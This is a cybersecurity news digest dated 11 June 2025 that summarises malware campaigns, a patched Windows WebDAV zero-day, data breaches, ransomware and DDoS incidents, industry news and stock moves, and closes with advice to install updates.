Cyber Briefing: 2025.06.11
FIN6 uses fake resumes to deliver malware, Microsoft patches WebDAV flaw, and fake SoraAI lures steal data. Sompo breach hits 17.5M, BHA attacked, DDoS hits Roularta. Swimlane raises $45M.
👉 What's trending in cybersecurity today?
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
First time seeing this? Please Subscribe
🚨 Cyber Alerts
1. FIN6 Uses Fake Resumes To Hack Recruiters
The FIN6 hacking group has flipped the script on typical hiring scams by impersonating job seekers to target recruiters and Human Resources departments with the 'More Eggs' malware. Attackers build rapport on platforms like LinkedIn and Indeed before sending phishing emails with non-clickable URLs to fake resume sites that use fingerprinting and CAPTCHAs to filter for legitimate targets. Victims are prompted to download a ZIP archive containing a malicious LNK file which executes a script to install the 'More Eggs' backdoor, a malware-as-a-service tool used for credential theft and deploying ransomware. This effective social engineering campaign highlights the need for recruiters to be cautious with unsolicited portfolios and to independently verify a candidate's identity before opening files from external sites.
2. Microsoft Fixes Exploited WebDAV Zero Day
Microsoft has released security updates to fix 67 vulnerabilities, including a critical WebDAV zero-day flaw, CVE-2025-33053, which it confirmed is being actively exploited in the wild. Security firm Check Point attributed the exploitation to the Stealth Falcon hacking group, who used the vulnerability to deliver a custom malware implant called Horus Agent to a Turkish defense company. The attack involved using a malicious URL file to trigger the remote code execution flaw, prompting CISA to add the vulnerability to its Known Exploited Vulnerabilities catalog. This month's patches also addressed other critical issues, including a privilege escalation flaw in Power Automate and a secure boot bypass bug discovered by Binarly.
3. Fake Sora AI Lure Installs Infostealer
Cybercriminals are exploiting the popularity of OpenAI's Sora video generation model to distribute an infostealer disguised as a legitimate "SoraAI.lnk" shortcut file. This campaign lures users into executing a multi-stage attack chain that begins with a PowerShell process downloading malicious batch and Python scripts from GitHub. The final payload steals a wide range of sensitive data, including browser cookies and passwords, cryptocurrency wallets, and Wi-Fi credentials, which it exfiltrates via a Telegram bot API. This social engineering attack underscores the risk of downloading files from unofficial sources, as the malware can lead to identity theft and further exploitation.
For more alerts, click here!
💥 Cyber Incidents
4. Sompo Data Breach Puts 17.5M Records At Risk
Sompo Japan Insurance has announced that up to 17.5 million customer records may have been leaked after an unauthorized third party gained access to its internal systems in April 2025. The data that was potentially viewed or stolen includes policyholder names, contact information, and insurance policy numbers, although no illegal use of the information has been confirmed yet. The company is now contacting affected individuals and has set up a dedicated support line, but this breach is part of a rising trend of major data leaks in Japan. This incident at Sompo Japan is one of the largest of its kind and follows other massive breaches at companies like Benesse Corporation and an NTT Japan West subsidiary in recent years.
5. BHA Hit By Ransomware But Races Continue
The British Horseracing Authority (BHA) has become the latest major UK organization targeted by a cyberattack, which it identified as a ransomware incident at the end of last week. As a result, the BHA's London office has been temporarily closed with staff working remotely while an investigation is conducted with external cybersecurity specialists, and law enforcement has been notified. The sporting body has assured the public that the incident appears limited to internal systems and that the delivery of all scheduled racedays has continued and will proceed as normal. This attack follows a recent wave of similar cyber incidents that have impacted major UK retailers like Marks & Spencer and the Co-op, highlighting a concerning trend.
6. DDoS Disrupts Roularta Media In Belgium
Roularta Media Group in Belgium was targeted by a significant cyberattack on Tuesday, which was identified as a Distributed Denial of Service (DDoS) attack that overloaded its servers with traffic. This has caused major disruptions, making it difficult for users to access the websites and apps of its popular media brands, such as Knack and Libelle. The DDoS attacks also impacted operations at the company’s printing facility in Roeselare, potentially delaying the delivery of newspapers and magazines. While there is currently no indication of a ransomware attack, the company's teams are working with IT provider Proximus to resolve the issue as quickly as possible.
For more incidents, click here!
📢 Cyber News
7. Half Of Mobile Users Face Daily Scams
A new Malwarebytes survey of 1,300 adults found that nearly half (44%) of mobile users face scams and threats daily, with two-thirds admitting it's increasingly difficult to spot them. These threats, most commonly delivered via email, SMS, and social media, frequently use social engineering, a trend corroborated by other studies showing a steep rise in mobile-specific phishing attacks. Many users have also encountered extortion threats like ransomware and deepfake scams, with the report finding three-quarters of victims have experienced emotional harm as a result. Researchers conclude that as cybercriminals adopt more sophisticated AI technologies, users must be empowered with better tools and knowledge to spot, stop, and report scams.
8. Guilty Pleas In 37M Pig Butchering Scam
Five men from China, the United States, and Turkey have pleaded guilty to their involvement in an international crime ring that laundered nearly $37 million stolen from U.S. victims. The funds were obtained from "pig butchering" crypto scams run from Cambodia, where victims were tricked into sending money to a Bahamas bank account under the name of a shell company, Axis Digital Limited. The conspirators, including Los Angeles network leader Joseph Wong, used U.S. shell companies and international accounts to funnel the money, eventually converting it to Tether (USDT) and sending it to a wallet in Cambodia. These new guilty pleas bring the total number of convicted members in this crime ring to eight, highlighting a major law enforcement success against large-scale crypto fraud.
9. Swimlane Raises $45M For AI SecOps Platform
Denver-based security automation firm Swimlane announced it has raised $45 million in a growth funding round led by Energy Impact Partners and Activate Capital, bringing its total funding to $215 million. The company's platform uses agentic AI, including a SecOps companion named Hero, to provide hyperautomation capabilities for unified management of security tools and signals. Serving clients that include 26 U.S. federal agencies and over 50 Global 1,000 companies, Swimlane's technology can automate over 25 million daily actions for each customer. Swimlane will use the new capital to invest in further product innovation and to scale its go-to-market operations with a focus on global channel expansion in North America and EMEA.
For more news, click here!
📈Cyber Stocks
As U.S. markets open on Wednesday, June 11, 2025, these cybersecurity leaders display modest daily shifts amid mixed sector catalysts:
Zscaler (ZS): Trading at $297.97, down 0.62%, pressured by insider stock sales, though recent analyst upgrades and steady institutional buying support confidence .
Varonis (VRNS): Trading at $50.48, down 0.36%, maintaining flat movement as demand for data-centric security remains stable.
Palo Alto Networks (PANW): Trading at $195.95, down 0.17%, showing resilience despite broader tech volatility, underpinned by ongoing investment in AI-enhanced next-gen security.
CrowdStrike (CRWD): Trading at $467.65, up 0.70%, following a 4% pullback this week on cautious guidance; analysts still rate it a strong buy, with price targets averaging $488 .
Fortinet (FTNT): Trading at $101.63, down 0.42%, on track after recent gains, powered by robust financials and strong buyback activity.
💡 Cyber Tip
Update Your Windows Devices Now to Stay Protected.
Microsoft has fixed a critical vulnerability (CVE-2025-33053) in its WebDAV service that allowed attackers to run malicious code just by getting users to open a specially crafted URL file. The flaw is already being used by a hacking group known as Stealth Falcon.
✅ What you should do
Go to settings on your windows devices and install all available updates right away.
Be extra cautious about opening unknown files, especially those ending in .url or received by email or messaging apps.
Use reputable antivirus software and make sure it's up to date.
If you're in a sensitive industry like defense or government, consult your security team for any additional steps.
🔒 Why this matters
This vulnerability is being used right now in targeted attacks. Updating your system is the easiest and most effective way to stop it from affecting you.
📚 Cyber Book
Stop The Cyber Bleeding: What Healthcare Executives and Board Members Must Know About Enterprise Cyber Risk Management by Bob Chaput
That concludes today’s briefing . You can check the top headlines here!
Copyright © 2025 CyberMaterial. All Rights Reserved.
Follow CyberMaterial on:
Substack, LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.